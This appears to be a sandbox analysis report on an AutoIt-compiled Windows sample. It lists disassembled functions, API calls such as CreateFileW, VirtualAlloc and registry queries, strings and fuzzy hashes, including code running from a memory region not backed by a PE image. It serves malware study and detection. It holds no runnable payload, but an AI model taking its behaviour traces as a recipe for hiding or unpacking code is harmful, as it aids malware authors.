                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                    • API String ID: 975902462-1005189915
                                    • Opcode ID: a9255330b131cd10c03d8ff0895ed28d9b11dd68e63d1ff694f4bf89059ca3b2
                                    • Instruction ID: 00975f1f979b2c31638a8f709d576ab8273f50f2a53b3d05fd37069e8b82a029
                                    • Opcode Fuzzy Hash: a9255330b131cd10c03d8ff0895ed28d9b11dd68e63d1ff694f4bf89059ca3b2
                                    • Instruction Fuzzy Hash: 2721F7B5925208AFDB10DFE4EC48B9DBBF4FB09700F01412AF510A62A1DBB14644AF91
                                    Function 015F9220 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1015 15f9220-15f9272 call 15f9120 CreateFileW 1018 15f927b-15f9288 1015->1018 1019 15f9274-15f9276 1015->1019 1022 15f929b-15f92b2 VirtualAlloc 1018->1022 1023 15f928a-15f9296 1018->1023 1020 15f93d4-15f93d8 1019->1020 1024 15f92bb-15f92e1 CreateFileW 1022->1024 1025 15f92b4-15f92b6 1022->1025 1023->1020 1027 15f9305-15f931f ReadFile 1024->1027 1028 15f92e3-15f9300 1024->1028 1025->1020 1029 15f9343-15f9347 1027->1029 1030 15f9321-15f933e 1027->1030 1028->1020 1031 15f9349-15f9366 1029->1031 1032 15f9368-15f937f WriteFile 1029->1032 1030->1020 1031->1020 1035 15f93aa-15f93cf CloseHandle VirtualFree 1032->1035 1036 15f9381-15f93a8 1032->1036 1035->1020 1036->1020
                                    APIs
                                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 015F9265
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_15f8000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                    • Instruction ID: e8f31f88df10e87e490cc73a2eed4b1a74590f06fda4d2631aa2d1e9003e6e0d
                                    • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                    • Instruction Fuzzy Hash: 0F51E675A50208FBEF20DFA4CC59FDE77B8BF88704F108958F60AEA1C0DA7496458B60
                                    Function 008839D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1055 8839d5-883a45 CreateWindowExW * 2 ShowWindow * 2
                                    APIs
                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00883A03
                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00883A24
                                    • ShowWindow.USER32(00000000,?,?), ref: 00883A38
                                    • ShowWindow.USER32(00000000,?,?), ref: 00883A41
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$CreateShow
                                    • String ID: AutoIt v3$edit
                                    • API String ID: 1584632944-3779509399
                                    • Opcode ID: d94a07d8a0ca690f4292cd194d1246aafc6b8e235466bdf824457231dfc4b232
                                    • Instruction ID: fc30085b1451f23279213fd343615261cb12c3aa5020906dfd2e799457c52f9b
                                    • Opcode Fuzzy Hash: d94a07d8a0ca690f4292cd194d1246aafc6b8e235466bdf824457231dfc4b232
                                    • Instruction Fuzzy Hash: 1BF03A74665690BFEA3167A76C18E2B3E7DE7C7F50B02012AB910A21B1C2A10C00EAB0
                                    Function 0088407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1056 88407c-884092 1057 884098-8840ad call 887a16 1056->1057 1058 88416f-884173 1056->1058 1061 8bd3c8-8bd3d7 LoadStringW 1057->1061 1062 8840b3-8840d3 call 887bcc 1057->1062 1065 8bd3e2-8bd3fa call 887b2e call 886fe3 1061->1065 1062->1065 1066 8840d9-8840dd 1062->1066 1075 8840ed-88416a call 8a2de0 call 88454e call 8a2dbc Shell_NotifyIconW call 885904 1065->1075 1078 8bd400-8bd41e call 887cab call 886fe3 call 887cab 1065->1078 1068 8840e3-8840e8 call 887b2e 1066->1068 1069 884174-88417d call 888047 1066->1069 1068->1075 1069->1075 1075->1058 1078->1075
                                    APIs
                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 008BD3D7
                                      • Part of subcall function 00887BCC: _memmove.LIBCMT ref: 00887C06
                                    • _memset.LIBCMT ref: 008840FC
                                    • _wcscpy.LIBCMT ref: 00884150
                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00884160
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                    • String ID: Line:
                                    • API String ID: 3942752672-1585850449
                                    • Opcode ID: da01ca5e688bafeb1cc74240157a442a024100bde181953a306c1ca1eafea671
                                    • Instruction ID: b36edd8ab939b980b9a28d1c4b60b0d92b2a29d4950c81c7078437adf8d3ca8b
                                    • Opcode Fuzzy Hash: da01ca5e688bafeb1cc74240157a442a024100bde181953a306c1ca1eafea671
                                    • Instruction Fuzzy Hash: 4931AF72018705ABD321FBA4DC45FDB77E8FB45314F20451AF595D21A2EB709648CB93
                                    Function 008A541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1150 8a541d-8a5436 1151 8a5438-8a543d 1150->1151 1152 8a5453 1150->1152 1151->1152 1153 8a543f-8a5441 1151->1153 1154 8a5455-8a545b 1152->1154 1155 8a545c-8a5461 1153->1155 1156 8a5443-8a5448 call 8a8b28 1153->1156 1157 8a546f-8a5473 1155->1157 1158 8a5463-8a546d 1155->1158 1168 8a544e call 8a8db6 1156->1168 1161 8a5483-8a5485 1157->1161 1162 8a5475-8a5480 call 8a2de0 1157->1162 1158->1157 1160 8a5493-8a54a2 1158->1160 1166 8a54a9 1160->1166 1167 8a54a4-8a54a7 1160->1167 1161->1156 1165 8a5487-8a5491 1161->1165 1162->1161 1165->1156 1165->1160 1170 8a54ae-8a54b3 1166->1170 1167->1170 1168->1152 1172 8a54b9-8a54c0 1170->1172 1173 8a559c-8a559f 1170->1173 1174 8a54c2-8a54ca 1172->1174 1175 8a5501-8a5503 1172->1175 1173->1154 1174->1175 1178 8a54cc 1174->1178 1176 8a556d-8a556e call 8b0ba7 1175->1176 1177 8a5505-8a5507 1175->1177 1187 8a5573-8a5577 1176->1187 1180 8a552b-8a5536 1177->1180 1181 8a5509-8a5511 1177->1181 1182 8a55ca 1178->1182 1183 8a54d2-8a54d4 1178->1183 1190 8a553a-8a553d 1180->1190 1191 8a5538 1180->1191 1188 8a5513-8a551f 1181->1188 1189 8a5521-8a5525 1181->1189 1186 8a55ce-8a55d7 1182->1186 1184 8a54db-8a54e0 1183->1184 1185 8a54d6-8a54d8 1183->1185 1192 8a54e6-8a54ff call 8b0cc8 1184->1192 1193 8a55a4-8a55a8 1184->1193 1185->1184 1186->1154 1187->1186 1194 8a5579-8a557e 1187->1194 1195 8a5527-8a5529 1188->1195 1189->1195 1190->1193 1196 8a553f-8a554b call 8a46e6 call 8b0e5b 1190->1196 1191->1190 1210 8a5562-8a556b 1192->1210 1199 8a55ba-8a55c5 call 8a8b28 1193->1199 1200 8a55aa-8a55b7 call 8a2de0 1193->1200 1194->1193 1198 8a5580-8a5591 1194->1198 1195->1190 1211 8a5550-8a5555 1196->1211 1205 8a5594-8a5596 1198->1205 1199->1168 1200->1199 1205->1172 1205->1173 1210->1205 1212 8a555b-8a555e 1211->1212 1213 8a55dc-8a55e0 1211->1213 1212->1182 1214 8a5560 1212->1214 1213->1186 1214->1210
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                    • String ID:
                                    • API String ID: 1559183368-0
                                    • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                    • Instruction ID: d17f0ece17541749cbd48c8492f7fad816560924eb2de1cc81cbe95baf942190
                                    • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                    • Instruction Fuzzy Hash: 1251D370E01B09DBEB248E69D8806AE77A2FF46334F248729F825D6AD1D770DDD08B45
                                    Function 0088686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00884DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00884E0F
                                    • _free.LIBCMT ref: 008BE263
                                    • _free.LIBCMT ref: 008BE2AA
                                      • Part of subcall function 00886A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00886BAD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                    • API String ID: 2861923089-1757145024
                                    • Opcode ID: b1b65f82109ea1c4abffa2fa5841c43c876d8f6653106518190809511abc1c62
                                    • Instruction ID: 3c74f3714d87e985ea68eaff0d881ca8f78ff520f4740bd0f7c64c94916341c0
                                    • Opcode Fuzzy Hash: b1b65f82109ea1c4abffa2fa5841c43c876d8f6653106518190809511abc1c62
                                    • Instruction Fuzzy Hash: F1916C71900219AFCF14EFA8CC919EEB7B8FF19314B10452AF816EB3A1DB70A915CB51
                                    Function 015FACB0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 015FABA0: Sleep.KERNELBASE(000001F4), ref: 015FABB1
                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015FADE6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_15f8000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CreateFileSleep
                                    • String ID: 0RI4G67BEUE5NC0OMWU
                                    • API String ID: 2694422964-189564730
                                    • Opcode ID: 404d9d9eb2f3fb70be51a2f1de6209437cc48add8bc64239be5e36ce6234b11d
                                    • Instruction ID: 87db207608467a2597c3cd42a77bb83ff7f3e83b016973120ed58799aac13b0a
                                    • Opcode Fuzzy Hash: 404d9d9eb2f3fb70be51a2f1de6209437cc48add8bc64239be5e36ce6234b11d
                                    • Instruction Fuzzy Hash: 7A518031D04249DBEF11DBB4C854BEEBBB9AF58300F004599E248BB2C1D7B90B45CBA6
                                    Function 008835B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008835A1,SwapMouseButtons,00000004,?), ref: 008835D4
                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008835A1,SwapMouseButtons,00000004,?,?,?,?,00882754), ref: 008835F5
                                    • RegCloseKey.KERNELBASE(00000000,?,?,008835A1,SwapMouseButtons,00000004,?,?,?,?,00882754), ref: 00883617
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: Control Panel\Mouse
                                    • API String ID: 3677997916-824357125
                                    • Opcode ID: 33f7347bde5489f20c00ca09925831944039847d0ece8a0980e93e4b4a669240
                                    • Instruction ID: fe0bb9443d7d22fa169642dea5373805f737febc28797ecf9303159ab993e237
                                    • Opcode Fuzzy Hash: 33f7347bde5489f20c00ca09925831944039847d0ece8a0980e93e4b4a669240
                                    • Instruction Fuzzy Hash: 12114871514208BFDB21DFA8DC409AEB7BCFF15B40F008469E805E7210E2719F40A760
                                    Function 008E955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00884EE5: _fseek.LIBCMT ref: 00884EFD
                                      • Part of subcall function 008E9734: _wcscmp.LIBCMT ref: 008E9824
                                      • Part of subcall function 008E9734: _wcscmp.LIBCMT ref: 008E9837
                                    • _free.LIBCMT ref: 008E96A2
                                    • _free.LIBCMT ref: 008E96A9
                                    • _free.LIBCMT ref: 008E9714
                                      • Part of subcall function 008A2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,008A9A24), ref: 008A2D69
                                      • Part of subcall function 008A2D55: GetLastError.KERNEL32(00000000,?,008A9A24), ref: 008A2D7B
                                    • _free.LIBCMT ref: 008E971C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                    • String ID:
                                    • API String ID: 1552873950-0
                                    • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                    • Instruction ID: 4325d7b12732718ba17752a8c7502476e4de4ce0aa15ee42fc7320b32d68b765
                                    • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                    • Instruction Fuzzy Hash: E2515CB1D04259ABDF249F69CC81A9EBBB9FF49300F10049EF649E3252DB715A80CF59
                                    Function 008A470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                    • String ID:
                                    • API String ID: 2782032738-0
                                    • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                    • Instruction ID: c06f6d0bbcb8cb81d9b9c5401ff45e0feee9acb21e078ef95811447167fd78c0
                                    • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                    • Instruction Fuzzy Hash: 9D41D574A007899BFF188E69D8809AE77A5FFC3364B24913DE815C7E40E7B4DD418B51
                                    Function 008844A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 008844CF
                                      • Part of subcall function 0088407C: _memset.LIBCMT ref: 008840FC
                                      • Part of subcall function 0088407C: _wcscpy.LIBCMT ref: 00884150
                                      • Part of subcall function 0088407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00884160
                                    • KillTimer.USER32(?,00000001,?,?), ref: 00884524
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00884533
                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008BD4B9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                    • String ID:
                                    • API String ID: 1378193009-0
                                    • Opcode ID: 1c827b7b58fbce9a258edce772c45ee051f565e4550a985e1606b1f4efa7e446
                                    • Instruction ID: 696304fb113badd45818d9eebf4fab6f295ab22be2a837dc1f186a689f435242
                                    • Opcode Fuzzy Hash: 1c827b7b58fbce9a258edce772c45ee051f565e4550a985e1606b1f4efa7e446
                                    • Instruction Fuzzy Hash: F8210A75508794AFE7329B248855BEBBBECFF01308F04009DE69ED6242D3742A84DB46
                                    Function 00887285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 008BEA39
                                    • 7523D0D0.COMDLG32(?), ref: 008BEA83
                                      • Part of subcall function 00884750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00884743,?,?,008837AE,?), ref: 00884770
                                      • Part of subcall function 008A0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008A07B0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: NamePath$7523FullLong_memset
                                    • String ID: X
                                    • API String ID: 3285060876-3081909835
                                    • Opcode ID: 78f864be753d9af6e036065db72282af5f0b97d215cd7edeeb4888f6f323712f
                                    • Instruction ID: 2e51949517c8ef0b4777623152bb82aae4eec6c56c4143743f33bca81b45395a
                                    • Opcode Fuzzy Hash: 78f864be753d9af6e036065db72282af5f0b97d215cd7edeeb4888f6f323712f
                                    • Instruction Fuzzy Hash: 8521A131A142589BDB51AF98C845AEF7BFDFF49314F10401AE408EB241DBB499898FA2
                                    Function 008E8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: __fread_nolock_memmove
                                    • String ID: EA06
                                    • API String ID: 1988441806-3962188686
                                    • Opcode ID: 8f6d9ce481f727261462a97cb37d35e395c92f2398d634edc594258fc9f9a289
                                    • Instruction ID: f536f45674bca0d80a777168c9c79451e297ce2bd3f5befcaff20ae01a8c38cc
                                    • Opcode Fuzzy Hash: 8f6d9ce481f727261462a97cb37d35e395c92f2398d634edc594258fc9f9a289
                                    • Instruction Fuzzy Hash: 76012D71D04258BEEB18CBA8CC16EFE7BF8DB12301F00419FF556D2181E875E6048B60
                                    Function 008A0DB6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008A571C: __FF_MSGBANNER.LIBCMT ref: 008A5733
                                      • Part of subcall function 008A571C: __NMSG_WRITE.LIBCMT ref: 008A573A
                                      • Part of subcall function 008A571C: RtlAllocateHeap.NTDLL(01550000,00000000,00000001), ref: 008A575F
                                    • std::exception::exception.LIBCMT ref: 008A0DEC
                                    • __CxxThrowException@8.LIBCMT ref: 008A0E01
                                      • Part of subcall function 008A859B: RaiseException.KERNEL32(?,?,00000000,00939E78,?,00000001,?,?,?,008A0E06,00000000,00939E78,00889E8C,00000001), ref: 008A85F0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
